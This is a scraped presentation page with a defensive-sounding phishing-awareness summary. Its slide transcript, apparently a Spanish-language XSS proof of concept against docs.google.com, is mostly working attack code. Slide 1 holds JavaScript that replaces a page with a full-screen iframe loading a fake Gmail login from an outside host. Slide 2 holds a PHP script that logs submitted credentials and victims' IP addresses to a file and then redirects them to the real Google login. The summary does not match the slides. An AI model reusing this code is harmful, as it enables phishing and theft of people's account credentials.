1 / 3

Protect Yourself: Understanding Phishing Threats in Online Services

Phishing attacks are increasingly sophisticated, often using fake websites to steal personal data. One common method involves creating an iframe that mimics legitimate sites, such as Gmail, tricking users into submitting sensitive information. This document highlights the mechanics of such phishing attempts, how attackers capture user details (including IP addresses), and the importance of recognizing suspicious links. Awareness and education are key to safeguarding against these threats. Always verify URLs and use two-factor authentication to protect your accounts.

dawn-price
Télécharger la présentation

Protect Yourself: Understanding Phishing Threats in Online Services

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. ::phising.js:: document.body.innerHTML = ''; var igoogle = document.createElement('iframe'); igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm'; igoogle.style.width = '100%'; igoogle.style.height = '100%'; igoogle.style.border = '0'; void(document.body.appendChild(igoogle)); XSS POC en docs.google.com

  2. ::gmailpost.php:: <?php $filename = 'gmail.txt'; if (count($_GET) == 0) die; $str = "-------------------\n"; $str .= "Date: " . date('d/m/Y - h:i:s a', time()) . "\n"; $str .= "IP: " . $_SERVER['REMOTE_ADDR'] . "\n"; $str .= "-------------------\n"; foreach ($_GET as $indice => $valor) { $str .= "$indice => $valor\n"; } $file = fopen($filename, 'a'); fwrite($file, $str); fclose($file); header('Location: https://www.google.com/accounts/ServiceLogin'); XSS POC en docs.google.com

  3. GANE DINERO GRATIS FREEMONEY $$

More Related